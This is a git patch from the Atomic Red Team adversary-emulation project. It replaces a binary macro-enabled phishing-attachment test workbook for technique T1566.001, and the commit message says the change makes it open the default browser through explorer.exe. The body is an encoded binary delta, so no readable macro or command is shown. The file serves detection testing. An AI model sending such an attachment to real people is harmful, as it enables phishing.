From 7e86e9a7811c25e5b4d694a52660b881f8204376 Mon Sep 17 00:00:00 2001 From: adeliktas <64136642+adeliktas@users.noreply.github.com> Date: Wed, 16 Jun 2021 20:38:40 +0200 Subject: [PATCH 47/84] T1566.001-1 using default Browser via explorer.exe instead of chrome PhishingAttachment.xlsm (#1520) --- atomics/T1566.001/bin/PhishingAttachment.xlsm | Bin 13498 -> 13517 bytes 1 file changed, 0 insertions(+), 0 deletions(-) diff --git a/atomics/T1566.001/bin/PhishingAttachment.xlsm b/atomics/T1566.001/bin/PhishingAttachment.xlsm index ee236ea0855333476c65f2773e2e0736faf3673c..9cbfd3f70ca8966176da991072f7e6af6b2d99ff 100644 GIT binary patch delta 9916 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 delta 9926 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 